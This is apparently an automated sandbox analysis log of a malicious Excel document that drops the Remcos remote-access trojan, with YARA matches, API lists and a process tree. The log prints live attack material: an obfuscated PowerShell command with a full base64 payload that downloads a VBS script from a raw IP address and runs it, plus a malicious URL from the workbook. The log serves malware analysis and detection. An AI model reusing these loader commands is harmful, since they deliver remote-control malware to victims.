                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0044081D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_00405038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00402F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_0041D071
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_004520D2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_0043D098
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00437150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_004361AA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00426254
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00431377
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_0043651C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_0041E5DF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_0044C739
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_004367C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_004267CB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_0043C9DD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00432A49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00436A8D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_0043CC0C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00436D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00434D22
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00426E73
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00440E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_0043CE3B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00412F45
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00452F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00426FAD
                  Source: 0200011080.xls OLE indicator, VBA macros: true
                  Source: CC430000.0.dr OLE indicator, VBA macros: true
                  Source: 0200011080.xls Stream path 'MBD001F7C6C/\x1Ole' : https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker_s$r(&D<ww(>Ki)H58pMI:}<qA^;'-{&FV7~j_2Lvo.#'HO~mPg@OzyPlPH-5FBmH1Tm3ME3XrMefYA0OxnC915NeitCTz9lMd35xt69DxMKYP72SCAfR2XsbTVnlxmedr6vMDdY33ERcnCux3esmvMwP9mylUDxQfvbkancgFmHZBQyF0xO3izBVpLfrLU241MnQsQQ0eLZaaqSqW1zpxlCHmF3HuWpD3aTKIOs0aazidKENDEhLixBE6mkhx5GcpElsmFZr6XkSRh7nkXtQki797jSVs1t8OJFPG@W:$oEV"Cl&c
                  Source: CC430000.0.dr Stream path 'MBD001F7C6C/\x1Ole' : https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker_s$r(&D<ww(>Ki)H58pMI:}<qA^;'-{&FV7~j_2Lvo.#'HO~mPg@OzyPlPH-5FBmH1Tm3ME3XrMefYA0OxnC915NeitCTz9lMd35xt69DxMKYP72SCAfR2XsbTVnlxmedr6vMDdY33ERcnCux3esmvMwP9mylUDxQfvbkancgFmHZBQyF0xO3izBVpLfrLU241MnQsQQ0eLZaaqSqW1zpxlCHmF3HuWpD3aTKIOs0aazidKENDEhLixBE6mkhx5GcpElsmFZr6XkSRh7nkXtQki797jSVs1t8OJFPG@W:$oEV"Cl&c
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 004169A7 appears 87 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 004020E7 appears 39 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 0044DB70 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 004165FF appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00422297 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00401F66 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00444B5A appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 004338A5 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00413025 appears 79 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00416760 appears 69 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00433FB0 appears 55 times
                  Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: powershell.exe PID: 3984, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 2112, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: bhv5265.tmp.29.dr Binary or memory string: org.slneighbors
                  Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winXLS@37/39@13/5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\CC430000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-Z4DJFI
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRA8AD.tmp
                  Source: 0200011080.xls OLE indicator, Workbook stream: true
                  Source: CC430000.0.dr OLE indicator, Workbook stream: true
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe System information queried: HandleInformation
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                  Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: CasPol.exe, CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: CasPol.exe, CasPol.exe, 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: CasPol.exe, CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: CasPol.exe, CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: CasPol.exe, CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: CasPol.exe, CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: 0200011080.xls ReversingLabs: Detection: 13%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_30-33246
                  Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBA2.tmp" "c:\Users\user\AppData\Local\Temp\sietgs52\CSC6D12096A8D2545939E28F0D748EE93EA.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline"
